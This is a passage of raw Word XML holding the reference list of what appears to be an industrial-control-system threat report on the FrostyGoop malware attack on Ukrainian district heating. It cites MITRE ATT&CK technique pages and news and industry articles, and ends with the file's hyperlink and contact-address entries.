      </w:hyperlink>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[60] MITRE ATT&amp;CK for ICS, "T0846: Remote System Discovery," v2.1, October 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org/techniques/T0846/</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[62] MITRE ATT&amp;CK for ICS, "T0821: Modify Controller Tasking," v2.1, October 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org/techniques/T0821/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7r7enyrsf4l1" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">News and Media</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] WIRED, "How Russia-Linked Malware Cut Heat to 600 Ukrainian Buildings in Winter," July 23, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.wired.com/story/russia-ukraine-frostygoop-malware-heating-utility/</w:t>
        </w:r>
      </w:hyperlink>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[10] SecurityWeek, "FrostyGoop ICS Malware Left Ukrainian City's Residents Without Heating," July 23, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.securityweek.com/frostygoop-ics-malware-left-ukrainian-citys-residents-without-heating/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rcwfxs7qbh8l" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Industry Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Field Effect, "FrostyGoop Malware Freezes Ukrainian Power Company," Field Effect Blog, July 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://fieldeffect.com/blog/frostygoop-malware-freeze-ukraine</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[46] Industrial Cyber, "Analysis: Infrastructure Dependencies in District Heating Attacks," February 2024.</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[References continue through [96] - truncated for length]</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bCs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bCs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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">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ttack.mitre.org/techniques/T0821/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T0846/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securityweek.com/frostygoop-ics-malware-left-ukrainian-citys-residents-without-heating/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wired.com/story/russia-ukraine-frostygoop-malware-heating-ut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techniques/T1133/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:NCC-OTCE-Intelligence@nccgroup.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fieldeffect.com/blog/frostygoop-malware-freeze-ukraine" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:otce-response@nccgroup.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hub.dragos.com/hubfs/Reports/Dragos-FrostyGoop-ICS-Malware-Intel-Brief-0724_.pdf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.epravda.com.ua/news/2024/01/23/709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